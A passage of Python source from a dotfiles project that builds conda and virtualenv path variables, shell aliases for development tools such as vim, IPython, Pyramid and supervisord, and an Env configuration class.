CONDA_ENVS__py27 (str): path to conda27 envs (e.g. WORKON_HOME)
CONDA_ROOT__py34 (str): path to conda34 root environment
CONDA_ENVS__py34 (str): path to conda34 envs (e.g. WORKON_HOME)
Keyword Arguments:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
"""
if env is None:
env = Env()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
# get default env paths
confs = [
dict(
env_prefix="__py",
env_suffix="27",
env_root_prefix="-conda",
env_home_prefix="-ce",
),
dict(
env_prefix="__py",
env_suffix="34",
env_root_prefix="-conda",
env_home_prefix="-ce",
),
dict(
env_prefix="__py",
env_suffix="35",
env_root_prefix="-conda",
env_home_prefix="-ce",
),
dict(
env_prefix="__py",
env_suffix="36",
env_root_prefix="-conda",
env_home_prefix="-ce",
),
dict(
env_prefix="__py",
env_suffix="37",
env_root_prefix="-conda",
env_home_prefix="-ce",
),
]
for conf in confs:
# CONDA27
env_name = "{env_prefix}{env_suffix}".format(**conf)
# -conda27
env_root = "{env_root_prefix}{env_suffix}".format(**conf)
# -ce27
env_home = "{env_home_prefix}{env_suffix}".format(**conf)
root_key = "CONDA_ROOT{env_name}".format(env_name=env_name)
home_key = "CONDA_ENVS{env_name}".format(env_name=env_name)
env[root_key] = (kwargs.get(root_key, env.get(root_key)) or
joinpath(env['__WRK'], env_root))
env[home_key] = (kwargs.get(home_key, env.get(home_key)) or
joinpath(env['__WRK'], env_home))
return env
DEFAULT_CONDA_ROOT_DEFAULT = 'CONDA_ROOT__py37'
DEFAULT_CONDA_ENVS_DEFAULT = 'CONDA_ENVS__py37'
def build_conda_cfg_env(env=None, **kwargs):
"""
Configure conda for a specific environment
TODO build_venv_config
Args:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
"""
if env is None:
env = Env()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
conda_envs = [27, 34, 35, 36, 37]
for n in conda_envs:
env['CONDA_ROOT__py%s' % n] = (
lookup('CONDA_ROOT__py%s % n',
default=joinpath(env['__WRK'], '-conda%s' % n)))
env['CONDA_ENVS__py%s' % n] = (
lookup('CONDA_ENVS__py%s' % n,
default=joinpath(env['__WRK'], '-ce%s' % n)))
# env['CONDA_ROOT__py27'] = lookup('CONDA_ROOT__py27',
# default=joinpath(env['__WRK'], '-conda27'))
# env['CONDA_ENVS__py27'] = lookup('CONDA_ENVS__py27',
# default=joinpath(env['__WRK'], '-ce27'))
#env['CONDA_ROOT_DEFAULT'] = lookup('CONDA_ROOT_DEFAULT',
# default=DEFAULT_CONDA_ROOT_DEFAULT)
#env['CONDA_ENVS_DEFAULT'] = lookup('CONDA_ENVS_DEFAULT',
# default=DEFAULT_CONDA_ENVS_DEFAULT)
env['CONDA_ROOT'] = lookup('CONDA_ROOT',
default=env[DEFAULT_CONDA_ROOT_DEFAULT])
env['CONDA_ENVS_PATH'] = lookup('CONDA_ENVS_PATH',
default=env[DEFAULT_CONDA_ENVS_DEFAULT])
return env
def build_venv_paths_full_env(env=None,
pyver=None,
**kwargs):
"""
Set variables for standard paths in the environment
Keyword Args:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env` (default: None (Env()))
VENVPREFIX (str): venv prefix path (default: None (VIRTUAL_ENV))
VENVSTR (str): name of a VIRTUAL_ENV in WORKON_HOME or path to a VIRTUAL_ENV (default: None)
VIRTUAL_ENV (str): path to a VIRTUAL_ENV (default: None)
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
Raises:
StepConfigException: When not any((
VIRTUAL_ENV, VENVPREFIX, VENVSTR, VENVSTRAPP))
References:
- https://en.wikipedia.org/wiki/Unix_directory_structure
- https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard
"""
if env is None:
env = Env()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
if pyver is None:
pyver = get_pyver(pyver)
env['VENVPREFIX'] = lookup('VENVPREFIX', default=lookup('VIRTUAL_ENV'))
env['VENVSTR'] = lookup('VENVSTR')
env['VENVSTRAPP'] = lookup('VENVSTRAPP')
env['VIRTUAL_ENV'] = lookup('VIRTUAL_ENV')
env = Venv.parse_VENVSTR(env=env,
pyver=pyver,
**kwargs)
VIRTUAL_ENV = env.get('VIRTUAL_ENV')
VENVPREFIX = env.get('VENVPREFIX')
if VENVPREFIX in (None, False):
if VIRTUAL_ENV is not None:
VENVPREFIX = VIRTUAL_ENV
env['VENVPREFIX'] = VIRTUAL_ENV
else:
errmsg = (
{'msg': 'VENVPREFIX or VIRTUAL_ENV must be specified',
'env': env.to_json(indent=2),
#'envstr': str(env),
})
raise StepConfigException(errmsg)
env['_BIN'] = joinpath(VENVPREFIX, "bin") # ./bin
env['_ETC'] = joinpath(VENVPREFIX, "etc") # ./etc
env['_ETCOPT'] = joinpath(VENVPREFIX, "etc", "opt") # ./etc/opt
env['_HOME'] = joinpath(VENVPREFIX, "home") # ./home
env['_LIB'] = joinpath(VENVPREFIX, "lib") # ./lib
env['_PYLIB'] = joinpath(VENVPREFIX, "lib", # ./lib/pythonN.N
pyver)
env['_PYSITE'] = joinpath(VENVPREFIX, # ./lib/pythonN.N/site-packages
"lib",
pyver, 'site-packages')
env['_MNT'] = joinpath(VENVPREFIX, "mnt") # ./mnt
env['_MEDIA'] = joinpath(VENVPREFIX, "media") # ./media
env['_OPT'] = joinpath(VENVPREFIX, "opt") # ./opt
env['_ROOT'] = joinpath(VENVPREFIX, "root") # ./root
env['_SBIN'] = joinpath(VENVPREFIX, "sbin") # ./sbin
env['_SRC'] = joinpath(VENVPREFIX, "src") # ./src
env['_SRV'] = joinpath(VENVPREFIX, "srv") # ./srv
env['_TMP'] = joinpath(VENVPREFIX, "tmp") # ./tmp
env['_USR'] = joinpath(VENVPREFIX, "usr") # ./usr
env['_USRBIN'] = joinpath(VENVPREFIX, "usr", "bin") # ./usr/bin
env['_USRINCLUDE'] = joinpath(VENVPREFIX, "usr", "include") # ./usr/include
env['_USRLIB'] = joinpath(VENVPREFIX, "usr", "lib") # ./usr/lib
env['_USRLOCAL'] = joinpath(VENVPREFIX, "usr", "local") # ./usr/local
env['_USRLOCALBIN']= joinpath(VENVPREFIX, "usr", "local", "bin") # ./usr/local/bin
env['_USRSBIN'] = joinpath(VENVPREFIX, "usr", "sbin") # ./usr/sbin
env['_USRSHARE'] = joinpath(VENVPREFIX, "usr", "share") # ./usr/share
env['_USRSRC'] = joinpath(VENVPREFIX, "usr", "src") # ./usr/src
env['_VAR'] = joinpath(VENVPREFIX, "var") # ./var
env['_VARCACHE'] = joinpath(VENVPREFIX, "var", "cache") # ./var/cache
env['_VARLIB'] = joinpath(VENVPREFIX, "var", "lib") # ./var/lib
env['_VARLOCK'] = joinpath(VENVPREFIX, "var", "lock") # ./var/lock
env['_LOG'] = joinpath(VENVPREFIX, "var", "log") # ./var/log
env['_VARMAIL'] = joinpath(VENVPREFIX, "var", "mail") # ./var/mail
env['_VAROPT'] = joinpath(VENVPREFIX, "var", "opt") # ./var/opt
env['_VARRUN'] = joinpath(VENVPREFIX, "var", "run") # ./var/run
env['_VARSPOOL'] = joinpath(VENVPREFIX, "var", "spool") # ./var/spool
env['_VARTMP'] = joinpath(VENVPREFIX, "var", "tmp") # ./var/tmp
env['_WWW'] = joinpath(VENVPREFIX, "var", "www") # ./var/www
return env
def build_venv_paths_cdalias_env(env=None, **kwargs):
"""
Build CdAliases for standard paths
Keyword Args:
env (Env dict): :py:class:`Env`
Returns:
env (Env dict): :py:class:`Env`
with ``.aliases`` extended.
.. note:: These do not work in IPython as they run in a subshell.
See: :py:mod:`dotfiles.venv.venv_ipymagics`.
"""
if env is None:
env = Env()
aliases = env.aliases
aliases['cdhome'] = CdAlias('HOME', aliases=['cdh'])
aliases['cdwrk'] = CdAlias('__WRK')
aliases['cdddotfiles'] = CdAlias('__DOTFILES', aliases=['cdd'])
aliases['cdprojecthome'] = CdAlias('PROJECT_HOME', aliases=['cdp', 'cdph'])
aliases['cdworkonhome'] = CdAlias('WORKON_HOME', aliases=['cdwh', 'cdve'])
aliases['cdcondaenvspath'] = CdAlias('CONDA_ENVS_PATH', aliases=['cda', 'cdce'])
aliases['cdcondaroot'] = CdAlias('CONDA_ROOT', aliases=['cdr'])
aliases['cdvirtualenv'] = CdAlias('VIRTUAL_ENV', aliases=['cdv'])
aliases['cdsrc'] = CdAlias('_SRC', aliases=['cds'])
aliases['cdwrd'] = CdAlias('_WRD', aliases=['cdw'])
aliases['cdbin'] = CdAlias('_BIN', aliases=['cdb'])
aliases['cdetc'] = CdAlias('_ETC', aliases=['cde'])
aliases['cdlib'] = CdAlias('_LIB', aliases=['cdl'])
aliases['cdlog'] = CdAlias('_LOG')
aliases['cdpylib'] = CdAlias('_PYLIB')
aliases['cdpysite'] = CdAlias('_PYSITE', aliases=['cdsitepackages'])
aliases['cdvar'] = CdAlias('_VAR')
aliases['cdwww'] = CdAlias('_WWW', aliases=['cdww'])
aliases['cdls'] = """set | grep "^cd.*()" | cut -f1 -d" " #%l"""
aliases['cdhelp'] = """cat ${__DOTFILES}/''scripts/venv_cdaliases.sh | pyline.py -r '^\\s*#+\\s+.*' 'rgx and l'"""
return env
def build_user_aliases_env(env=None,
dont_reflect=False,
VIRTUAL_ENV=None,
_SRC=None,
_ETC=None,
_CFG=None,
PROJECT_FILES=None,
**kwargs):
"""
Configure env variables and return an OrderedDict of aliases
Args:
dont_reflect (bool): Whether to always create aliases and functions
referencing ``$_WRD`` even if ``$_WRD`` doesn't exist.
(default: False)
Returns:
OrderedDict: dict of aliases
"""
if env is None:
env = Env()
aliases = env.aliases
if VIRTUAL_ENV is not None:
env['VIRTUAL_ENV'] = VIRTUAL_ENV
if _SRC is not None:
env['_SRC'] = _SRC
if _ETC is not None:
env['_ETC'] = _ETC
if _CFG is not None:
env['_CFG'] = _CFG
if PROJECT_FILES is not None:
env['PROJECT_FILES'] = PROJECT_FILES
PROJECT_FILES = env.get('PROJECT_FILES', list())
env['PROJECT_FILES'] = PROJECT_FILES
VIRTUAL_ENV = env.get('VIRTUAL_ENV')
if VIRTUAL_ENV is None:
VIRTUAL_ENV = ""
env['VIRTUAL_ENV'] = VIRTUAL_ENV
logging.debug('VIRTUAL_ENV is none')
# raise Exception()
VIRTUAL_ENV_NAME = env.get('VIRTUAL_ENV_NAME',
VIRTUAL_ENV.split(os.path.sep)[0])
_SRC = env.get('_SRC')
if _SRC is None:
if VIRTUAL_ENV:
_SRC = joinpath(env['VIRTUAL_ENV'], 'src')
else:
_SRC = ""
env['_SRC'] = _SRC
_ETC = env.get('_ETC')
if _ETC is None:
if VIRTUAL_ENV:
_ETC = joinpath(env['VIRTUAL_ENV'], 'etc')
else:
_ETC = '/etc'
env['_ETC'] = _ETC
_APP = env.get('_APP')
if _APP is None:
if VIRTUAL_ENV_NAME:
_APP = VIRTUAL_ENV_NAME
else:
_APP = ''
env['_APP'] = _APP
_WRD = env.get('_WRD')
if _WRD is None:
if _SRC and _APP:
_WRD = joinpath(env['_SRC'], env['_APP'])
else:
_WRD = ""
env['_WRD'] = _WRD
def build_editor_env(env):
# EDITOR configuration
env['VIMBIN'] = distutils.spawn.find_executable('vim')
env['GVIMBIN'] = distutils.spawn.find_executable('gvim')
env['MVIMBIN'] = distutils.spawn.find_executable('mvim')
env['GUIVIMBIN'] = env.get('GVIMBIN', env.get('MVIMBIN'))
# set the current vim servername to _APP
VIMSERVER = '/'
if _APP:
VIMSERVER = _APP
env['VIMCONF'] = "--servername %s" % (
shell_quote(VIMSERVER).strip('"'))
if not env.get('GUIVIMBIN'):
env['_EDIT_'] = "%s -f" % env.get('VIMBIN')
else:
env['_EDIT_'] = '%s %s --remote-tab-silent' % (
env.get('GUIVIMBIN'),
env.get('VIMCONF'))
env['EDITOR_'] = env['_EDIT_']
aliases = env.aliases
aliases['editw'] = env['_EDIT_']
aliases['gvimw'] = env['_EDIT_']
return env
def build_ipython_env(env):
# IPYTHON configuration
env['_NOTEBOOKS'] = joinpath(env.get('_SRC',
env.get('__WRK',
env.get('HOME'))),
'notebooks')
env['_IPYSESKEY'] = joinpath(env.get('_SRC', env.get('HOME')),
'.ipyseskey')
if sys.version_info.major == 2:
_new_ipnbkey = "print os.urandom(128).encode(\\\"base64\\\")"
elif sys.version_info.major == 3:
_new_ipnbkey = "print(os.urandom(128).encode(\\\"base64\\\"))"
else:
raise KeyError(sys.version_info.major)
aliases = env.aliases
aliases['ipskey'] = ('(python -c \"'
'import os;'
' {_new_ipnbkey}\"'
' > {_IPYSESKEY} )'
' && chmod 0600 {_IPYSESKEY};'
' # %l'
).format(
_new_ipnbkey=_new_ipnbkey,
_IPYSESKEY=shell_varquote('_IPYSESKEY'))
aliases['ipnb'] = ('ipython notebook'
' --secure'
' --Session.keyfile={_IPYSESKEY}'
' --notebook-dir={_NOTEBOOKS}'
' --deep-reload'
' %l').format(
_IPYSESKEY=shell_varquote('_IPYSESKEY'),
_NOTEBOOKS=shell_varquote('_NOTEBOOKS'))
env['_IPQTLOG'] = joinpath(env['VIRTUAL_ENV'], '.ipqt.log')
aliases['ipqt'] = ('ipython qtconsole'
' --secure'
' --Session.keyfile={_IPYSESKEY}'
' --logappend={_IPQTLOG}'
' --deep-reload'
#' --gui-completion'
#' --existing=${_APP}'
' --pprint'
#' --pdb'
' --colors=linux'
' --ConsoleWidget.font_family="Monaco"'
' --ConsoleWidget.font_size=11'
' %l').format(
_IPYSESKEY=shell_varquote('_IPYSESKEY'),
_APP=shell_varquote('_APP'),
_IPQTLOG=shell_varquote('_IPQTLOG'))
return env
def build_grin_env(env):
aliases = env.aliases
aliases['grinv'] = 'grin --follow %%l %s' % shell_varquote('VIRTUAL_ENV')
aliases[
'grindv'] = 'grind --follow %%l --dirs %s' % shell_varquote('VIRTUAL_ENV')
aliases['grins'] = 'grin --follow %%l %s' % shell_varquote('_SRC')
aliases['grinds'] = 'grind --follow %%l --dirs %s' % shell_varquote('_SRC')
return env
def build_wrd_aliases_env(env):
_WRD = env['_WRD']
aliases = env.aliases
if os.path.exists(_WRD) or dont_reflect:
aliases['lsw'] = IpyAlias(
'(cd {_WRD}; ls $(test -n "{__IS_MAC}" && echo "-G" || echo "--color=auto") %l)'.format(
_WRD=shell_varquote('_WRD'),
__IS_MAC=shell_varquote('__IS_MAC')),
name='lsw',
complfuncstr="""local cur=${2};
COMPREPLY=($(cd ${_WRD}; compgen -f -- ${cur}));"""
)
aliases['findw'] = 'find {_WRD}'.format(
_WRD=shell_varquote('_WRD'))
aliases['grepw'] = 'grep %l {_WRD}'.format(
_WRD=shell_varquote('_WRD'))
aliases['grinw'] = 'grin --follow %l {_WRD}'.format(
_WRD=shell_varquote('_WRD'))
aliases['grindw'] = 'grind --follow %l --dirs {_WRD}'.format(
_WRD=shell_varquote('_WRD'))
env['PROJECT_FILES'] = " ".join(
str(x) for x in PROJECT_FILES)
aliases['editp'] = "ew ${PROJECT_FILES} %l"
aliases['makewrd'] = "(cd {_WRD} && make %l)".format(
_WRD=shell_varquote('_WRD'))
aliases['makew'] = aliases['makewrd']
aliases['makewlog'] = (
"_logfile=\"${_VARLOG}/make.log\"; "
"(makew %l 2>&1 | tee $_logfile) && e $_logfile")
else:
log.error('app working directory %r not found' % _WRD)
return env
def build_python_testing_env(env):
aliases = env.aliases
env['_TESTPY_'] = "(cd {_WRD} && python setup.py test)".format(
_WRD=shell_varquote('_WRD'),
)
aliases['testpyw'] = env['_TESTPY_']
aliases['testpywr'] = 'reset && %s' % env['_TESTPY_']
aliases['nosew'] = '(cd {_WRD} && nosetests %l)'.format(
_WRD=shell_varquote('_WRD'))
return env
def build_pyramid_env(env, dont_reflect=True):
_CFG = joinpath(env['_ETC'], 'development.ini')
if dont_reflect or os.path.exists(_CFG):
env['_CFG'] = _CFG
env['_EDITCFG_'] = "{_EDIT_} {_CFG}".format(
_EDIT_=env['_EDIT_'],
_CFG=env['_CFG'])
aliases['editcfg'] = "{_EDITCFG} %l".format(
_EDITCFG=shell_varquote('_EDITCFG_'))
# Pyramid pshell & pserve (#TODO: test -f manage.py (django))
env['_SHELL_'] = "(cd {_WRD} && {_BIN}/pshell {_CFG})".format(
_BIN=shell_varquote('_BIN'),
_CFG=shell_varquote('_CFG'),
_WRD=shell_varquote('_WRD'))
env['_SERVE_'] = ("(cd {_WRD} && {_BIN}/pserve"
" --app-name=main"
" --reload"
" --monitor-restart {_CFG})").format(
_BIN=shell_varquote('_BIN'),
_CFG=shell_varquote('_CFG'),
_WRD=shell_varquote('_WRD'))
aliases['servew'] = env['_SERVE_']
aliases['shellw'] = env['_SHELL_']
else:
logging.error('app configuration %r not found' % _CFG)
env['_CFG'] = ""
return env
def build_supervisord_env(env):
_SVCFG = env.get('_SVCFG', joinpath(env['_ETC'], 'supervisord.conf'))
if os.path.exists(_SVCFG) or dont_reflect:
env['_SVCFG'] = _SVCFG
env['_SVCFG_'] = ' -c %s' % shell_quote(env['_SVCFG'])
else:
logging.error('supervisord configuration %r not found' % _SVCFG)
env['_SVCFG_'] = ''
aliases = env.aliases
aliases['ssv'] = 'supervisord -c "${_SVCFG}"'
aliases['sv'] = 'supervisorctl -c "${_SVCFG}"'
aliases['svt'] = 'sv tail -f'
aliases['svd'] = ('supervisorctl -c "${_SVCFG}" restart dev'
' && supervisorctl -c "${_SVCFG}" tail -f dev')
return env
funcs = [
build_editor_env,
build_ipython_env,
build_grin_env,
build_wrd_aliases_env,
build_python_testing_env,
build_pyramid_env,
build_supervisord_env]
builder = StepBuilder(env)
for func in funcs:
builder.add_step(func)
return builder.build()
def build_usrlog_env(env=None,
_TERM_ID=None,
shell='bash',
prefix=None,
USER=None,
HOSTNAME=None,
lookup_hostname=False,
**kwargs):
"""
Build environment variables and configuration like usrlog.sh
Keyword Args:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
_TERM_ID (str): terminal identifier string
shell (str): shell name ("bash", "zsh")
prefix (str): a path prefix (e.g. ``$VIRTUAL_ENV`` or ``$PREFIX``)
USER (str): system username (``$USER``) for ``HISTTIMEFORMAT``
HOSTNAME (str): system hostname (``HOSTNAME``) for ``HISTTIMEFORMAT``
lookup_hostname (bool): if True, ``HOSTNAME`` is None,
and not env.get('HOSTNAME'), try to read ``HOSTNAME``
from ``os.environ`` and then ``socket.gethostname()``.
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
.. note:: Like ``usrlog.sh``, when ``HISTTIMEFORMAT`` is set,
``USER`` and ``HOSTNAME`` must be evaluated.
(When ``USER`` and ``HOSTNAME`` change, ``HISTTIMEFORMAT``
is not updated, and the .history file will contain only
the most recent USER and HOSTNAME settings,
which are not necessarily the actual USER and HOSTNAME.)
TODO: could/should instead (also) write USER and HOSTNAME
to -usrlog.log.
"""
if env is None:
env = Env()
env['HOME'] = env.get('HOME', os.path.expanduser('~'))
env['__WRK'] = env.get('__WRK',
get___WRK_default(env=env))
#env['HOSTNAME'] = HOSTNAME
#env['USER'] = USER
#HOSTNAME = env.get('HOSTNAME')
# if HOSTNAME is None:
# if lookup_hostname:
#HOSTNAME = os.environ.get('HOSTNAME')
# if HOSTNAME is None:
#HOSTNAME = __import__('socket').gethostname()
#env['HOSTNAME'] = HOSTNAME
# env['HISTTIMEFORMAT'] = '%F %T%z {USER} {HOSTNAME} '.format(
# USER=env.get('USER','-'),
# HOSTNAME=env.get('HOSTNAME','-'))
#env['HISTSIZE'] = 1000000
#env['HISTFILESIZE'] = 1000000
# user default usrlog
# env['__USRLOG'] = joinpath(env['HOME'], '-usrlog.log')
# current usrlog
if prefix is None:
prefix = env.get('VENVPREFIX', env.get('VIRTUAL_ENV'))
if prefix in (None, "/"):
prefix = env.get('HOME', os.path.expanduser('~'))
env['_USRLOG'] = joinpath(prefix, "-usrlog.log")
#_term_id = _TERM_ID if _TERM_ID is not None else (
# term_id_from_environ and os.environ.get('_TERM_ID'))
#if _term_id:
# env['_TERM_ID'] = _term_id
# env['_TERM_URI'] = _TERM_ID # TODO
# shell HISTFILE
# if shell == 'bash':
#env['HISTFILE'] = joinpath(prefix, ".bash_history")
# elif shell == 'zsh':
#env['HISTFILE'] = joinpath(prefix, ".zsh_history")
# else:
#env['HISTFILE'] = joinpath(prefix, '.history')
return env
def build_venv_activate_env(env=None,
VENVSTR=None,
VENVSTRAPP=None,
from_environ=False,
VENVPREFIX=None,
VIRTUAL_ENV=None,
VIRTUAL_ENV_NAME=None,
_APP=None,
_SRC=None,
_WRD=None,
**kwargs):
if env is None:
env = Env()
keys = [
'VENVPREFIX',
'VENVSTR',
'VENVSTRAPP',
'VIRTUAL_ENV',
'VIRTUAL_ENV_NAME',
'_APP',
'_SRC',
'_WRD',
]
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
_SENTINEL = None
_vars = vars()
for key in keys:
value = _vars.get(key, _SENTINEL)
if value is not _SENTINEL:
kwargs[key] = value
env[key] = lookup(key)
env = Venv.parse_VENVSTR(env=env,
from_environ=from_environ,
**kwargs)
env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
VIRTUAL_ENV = env.get('VIRTUAL_ENV')
if VIRTUAL_ENV is None:
return env
VIRTUAL_ENV_NAME = env.get('VIRTUAL_ENV_NAME')
if VIRTUAL_ENV_NAME is None:
pass
_APP = env.get('_APP')
if _APP is None:
if VIRTUAL_ENV_NAME is not None:
_APP = VIRTUAL_ENV_NAME
else:
_APP = ""
env['_APP'] = _APP
_ETC = env.get('_ETC')
if _ETC is None:
_ETC = joinpath(env['VIRTUAL_ENV'], 'etc')
env['_ETC'] = _ETC
_SRC = env.get('_SRC')
if _SRC is None:
_SRC = joinpath(env['VIRTUAL_ENV'], 'src')
env['_SRC'] = _SRC
_WRD = env.get('_WRD')
if _WRD is None:
_WRD = joinpath(env['_SRC'], env['_APP'])
env['_WRD'] = _WRD
return env
class Env(object):
"""
OrderedDict of variables for/from ``os.environ``.
"""
osenviron_keys_classic = (
# Comment example paths have a trailing slash,
# test and actual paths should not have a trailing slash
# from os.path import join as joinpath
# editors
'VIMBIN',
'GVIMBIN',
'MVIMBIN',
'GUIVIMBIN',
'VIMCONF',
'EDITOR',
'EDITOR_',
'PAGER',
# venv
'__WRK', # ~/-wrk/
'__DOTFILES',
# virtualenvwrapper
'PROJECT_HOME', # ~/-wrk/ #$__WRK
'WORKON_HOME', # ~/-wrk/-ve27/
'WORKON_HOME__py27', # ~/-wrk/-ve27/
'WORKON_HOME__py34', # ~/-wrk/-ve34/
# venv
# ~/-wrk/-ve27/dotfiles/ # ${VENVPREFIX:-${VIRTUAL_ENV}}
'VENVPREFIX',
'VENVSTR', # "dotfiles"
'VENVSTRAPP', # "dotfiles", "dotfiles/docs"
'_APP', # dotfiles/tests
'VIRTUAL_ENV_NAME', # "dotfiles"
# virtualenv
'VIRTUAL_ENV', # ~/-wrk/-ve27/dotfiles/ # ${VIRTUAL_ENV_NAME}
# venv
'_SRC', # ~/-wrk/-ve27/dotfiles/src/ # ${VIRTUAL_ENV}/src
'_ETC', # ~/-wrk/-ve27/dotfiles/etc/ # ${VIRTUAL_ENV}/etc
'_BIN',
'_CFG',
'_LIB',
'_LOG',
'_MNT',
'_OPT',
'_PYLIB',
'_PYSITE',
'_SRV',
'_VAR',
'_WRD',
'_WRD_SETUPY',
'_WWW',
# dotfiles
'__SRC',
'__DOCSWWW',
# usrlog
'_USRLOG',
'__USRLOG',
'_TERM_ID',
'_TERM_URI',
)
osenviron_keys = OrderedDict((
## <env>
# ("HOME", "/Users/W"),
("__WRK", "${HOME}/-wrk"),
("__SRC", "${__WRK}/-src"),
("__DOTFILES", "${HOME}/-dotfiles"),
("__WRK", "${HOME}/-wrk"),
#("PROJECT_HOME", "${HOME}/-wrk"),
("PROJECT_HOME", "${__WRK}"),
("CONDA_ROOT", "${__WRK}/-conda27"),
("CONDA_ENVS_PATH", "${__WRK}/-ce27"),
("WORKON_HOME", "${__WRK}/-ve27"),
("VENVSTR", "dotfiles"),
("VENVSTRAPP", "dotfiles"), # or None
("VIRTUAL_ENV_NAME", "dotfiles"),
("VIRTUAL_ENV", "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"),
("VENVPREFIX", "${VIRTUAL_ENV}"), # or /
("_APP", "dotfiles"),
("_ETC", "${VIRTUAL_ENV}/etc"),
("_SRC", "${VIRTUAL_ENV}/src"),
("_WRD", "${_SRC}/dotfiles"),
("_BIN", "${VIRTUAL_ENV}/bin"),
("_ETCOPT", "${_ETC}/opt"),
("_HOME", "${VIRTUAL_ENV}/home"),
("_LIB", "${VIRTUAL_ENV}/lib"),
("_PYLIB", "${_LIB}/python2.7"),
("_PYSITE", "${_PYLIB}/site-packages"),
("_MNT", "${VIRTUAL_ENV}/mnt"),
("_MEDIA", "${VIRTUAL_ENV}/media"),
("_OPT", "${VIRTUAL_ENV}/opt"),
("_ROOT", "${VIRTUAL_ENV}/root"),
("_SBIN", "${VIRTUAL_ENV}/sbin"),
("_SRV", "${VIRTUAL_ENV}/srv"),
("_TMP", "${VIRTUAL_ENV}/tmp"),
("_USR", "${VIRTUAL_ENV}/usr"),
("_USRBIN", "${VIRTUAL_ENV}/usr/bin"),
("_USRINCLUDE", "${VIRTUAL_ENV}/usr/include"),
("_USRLIB", "${VIRTUAL_ENV}/usr/lib"),
("_USRLOCAL", "${VIRTUAL_ENV}/usr/local"),
("_USRLOCALBIN", "${VIRTUAL_ENV}/usr/local/bin"),
("_USRSBIN", "${VIRTUAL_ENV}/usr/sbin"),
("_USRSHARE", "${VIRTUAL_ENV}/usr/share"),
("_USRSRC", "${VIRTUAL_ENV}/usr/src"),
("_VAR", "${VIRTUAL_ENV}/var"),
("_VARCACHE", "${_VAR}/cache"),
("_VARLIB", "${_VAR}/lib"),
("_VARLOCK", "${_VAR}/lock"),
("_LOG", "${_VAR}/log"),
("_VARMAIL", "${_VAR}/mail"),
("_VAROPT", "${_VAR}/opt"),
("_VARRUN", "${_VAR}/run"),
("_VARSPOOL", "${_VAR}/spool"),
("_VARTMP", "${_VAR}/tmp"),
("_WWW", "${_VAR}/www"),
("WORKON_HOME__py27", "${__WRK}/-ve27"),
("WORKON_HOME__py34", "${__WRK}/-ve34"),
("WORKON_HOME__py35", "${__WRK}/-ve35"),
("WORKON_HOME__py36", "${__WRK}/-ve36"),
("WORKON_HOME__py37", "${__WRK}/-ve37"),
("WORKON_HOME_DEFAULT", "WORKON_HOME__py37"),
("CONDA_ROOT__py27", "${__WRK}/-conda27"),
("CONDA_ENVS__py27", "${__WRK}/-ce27"),
("CONDA_ROOT__py34", "${__WRK}/-conda34"),
("CONDA_ENVS__py34", "${__WRK}/-ce34"),
("CONDA_ROOT__py35", "${__WRK}/-conda35"),
("CONDA_ENVS__py35", "${__WRK}/-ce35"),
("CONDA_ROOT__py36", "${__WRK}/-conda36"),
("CONDA_ENVS__py36", "${__WRK}/-ce36"),
("CONDA_ROOT__py37", "${__WRK}/-conda37"),
("CONDA_ENVS__py37", "${__WRK}/-ce37"),
#("CONDA_ROOT_DEFAULT", "CONDA_ROOT__py27"),
#("CONDA_ENVS_DEFAULT", "CONDA_ENVS__py27"),
#("PROJECT_FILES", ""),
#("VIMBIN", "/usr/bin/vim"),
#("GVIMBIN", "/usr/local/bin/gvim"),
#("MVIMBIN", "/usr/local/bin/mvim"),
#("GUIVIMBIN", "/usr/local/bin/gvim"),
#("VIMCONF", "--servername dotfiles"),
#("_EDIT_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent"),
#("EDITOR_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent"),
#("_NOTEBOOKS", "${_SRC}/notebooks"),
#("_IPYSESKEY", "${_SRC}/.ipyseskey"),
#("_IPQTLOG", "${VIRTUAL_ENV}/.ipqt.log"),
#("_WRD_SETUPY", "${_WRD}/setup.py"),
#("_TEST_", "(cd {_WRD} && python \"${_WRD_SETUPY}\" test)"),
#("_CFG", "${_ETC}/development.ini"),
#("_EDITCFG_", "/usr/local/bin/gvim --servername dotfiles --remote-tab-silent ${_ETC}/development.ini"),
#("_SHELL_", "(cd {_WRD} && \"${_BIN}\"/pshell \"${_CFG}\")"),
#("_SERVE_", "(cd {_WRD} && \"${_BIN}\"/pserve --app-name=main --reload --monitor-restart \"${_CFG}\")"),
#("_SVCFG", "${_ETC}/supervisord.conf"),
#("_SVCFG_", " -c \"${_ETC}/supervisord.conf\""),
#("__USRLOG", "${HOME}/-usrlog.log"),
#("_USRLOG", "${VIRTUAL_ENV}/-usrlog.log"),
))
def __init__(self, *args, **kwargs):
if 'name' in kwargs:
self._name = kwargs.pop('name', None)
self.environ = OrderedDict(*args, **kwargs)
self.aliases = OrderedDict()
self.logevent('env', "__init__")
@property
def name(self):
return getattr(self, '_name', str(hex(id(self))))
def logevent(self, *args, **kwargs):
#kwargs['logger'] = self.log
args = list(args)
if args[0].startswith('env'):
args[0] = 'env {} {}'.format(
self.name,
args[0][3:])
return logevent(*args, **kwargs)
def __setitem__(self, k, v):
self.logevent("envexport", "{}={}".format(k, v))
return self.environ.__setitem__(k, v)
def __getitem__(self, k, *args, **kwargs):
try:
v = self.environ.__getitem__(k, *args, **kwargs)
self.logevent("env[k] ", "{}={}".format(k, repr(v)))
return v
except Exception as e:
self.logevent("env[k] ", "{}={}".format(k, e))
raise
def __contains__(self, k):
